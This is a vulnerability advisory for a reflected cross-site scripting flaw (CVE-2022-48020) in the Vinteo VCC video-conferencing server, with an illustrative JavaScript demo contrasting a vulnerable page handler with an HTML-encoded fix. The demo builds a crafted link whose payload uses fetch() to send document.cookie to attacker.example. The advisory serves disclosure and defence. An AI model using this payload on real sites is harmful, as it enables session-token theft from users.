Title: Reflected Cross-Site Scripting (XSS) | Product: Vinteo VCC | Vulnerable Version: version 2.36.4 | Fixed Version: version 28.1.3 |
CVE Number: CVE-2022-48020 | Impact: medium | Homepage: https://vinteo.com/en/ | Found: October 2022 |
By: D. Kiryukhin (Office Moscow) | SEQ LLC |
Vinteo Video Core is a software server that forms the core of a video conferencing and communication system.
With Vinteo Video Core, up to 1,000 participants can be connected to a videoconference simultaneously.
The solution supports WebRTC, which allows participants to join a videoconference directly from a browser
without installing any specialized software.
Source: https://vinteo.com/en/vinteo-solutions/vinteo-video-core
The vendor has released a patched version of the product, and users are urged to upgrade to the latest available version immediately.
SEQ LLC recommends a thorough security review, conducted by security professionals, to identify and resolve all remaining security issues.
Reflected Cross-Site Scripting (CVE-2022-48020)
With reflected cross-site scripting, an attacker can inject arbitrary HTML or JavaScript into a page that the vulnerable site returns to the victim's browser. Once the victim opens a crafted link, the attacker's code executes in the victim's browser within the origin of the vulnerable site. The vulnerability can be used to alter the contents of the displayed page, redirect the user to other sites, or steal session tokens and user credentials. Additionally, affected users are potential victims of browser exploits and JavaScript trojans.
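The pattern described above in minimal form, added here as an illustration; this is not Vinteo's code and does not reproduce the affected endpoint, which this advisory does not detail. The search page, the parameter name q, the attacker host and the payload are assumptions. The vulnerable handler concatenates a query-string value into the response unencoded; the hardened version encodes it for the HTML text context before it is reflected.

```javascript
// Added example, not Vinteo's code: a hypothetical /search page that reflects ?q=
// into its HTML, shown in its vulnerable form and in a hardened form.

// Vulnerable: the reflected value is concatenated into HTML without encoding,
// so markup in the query string becomes part of the page.
function renderSearchVulnerable(query) {
  return `<!doctype html><p>Results for: ${query}</p>`;
}

// HTML-encode for the text-content and attribute-value contexts.
// (A value placed into a <script> block or a URL attribute needs a different
// encoder; this one is only correct for the context used below.)
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: same page, same value, but encoded for the context it lands in.
function renderSearchSafe(query) {
  return `<!doctype html><p>Results for: ${escapeHtml(query)}</p>`;
}

// Pull the reflected parameter out of a request URL the way a server would.
function queryFromUrl(requestUrl) {
  return new URL(requestUrl, 'http://localhost').searchParams.get('q') ?? '';
}

// Crude check used by the demo: does the response contain the input verbatim
// even though the input carries markup characters?
function reflectsRawMarkup(html, input) {
  return /[<>"']/.test(input) && html.includes(input);
}

// Constructed attacker link (hypothetical target and attacker hosts).
const MALICIOUS_LINK =
  'http://target.example/search?q=' +
  encodeURIComponent('<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">');

// Render the page both ways for the value a victim's click would deliver.
function demo() {
  const q = queryFromUrl(MALICIOUS_LINK);
  const vulnerable = renderSearchVulnerable(q);
  const safe = renderSearchSafe(q);
  return {
    vulnerableReflectsMarkup: reflectsRawMarkup(vulnerable, q), // true
    safeReflectsMarkup: reflectsRawMarkup(safe, q),             // false
    safeHtml: safe,
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

Output encoding at the point of reflection is the fix that removes the bug; a Content-Security-Policy that disallows inline script is a useful second layer but does not replace it.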
The following version was tested and found to be vulnerable: Vinteo VCC version 2.36.4
Vendor contact timeline:
2022-10-25: Contacted the vendor by email
2022-12-21: Contacted the vendor by email with information about the application to MITRE for a CVE ID
The vendor provides an updated version, which should be installed immediately:
https://vinteo.com/ru/news/463-obnovlenie-bezopasnosti-servera-vks-vinteo-2
https://seq.team/en/blog/reflected-cross-site-scripting-xss-in-vinteo-vcc/
EOF D. Kiryukhin / @2022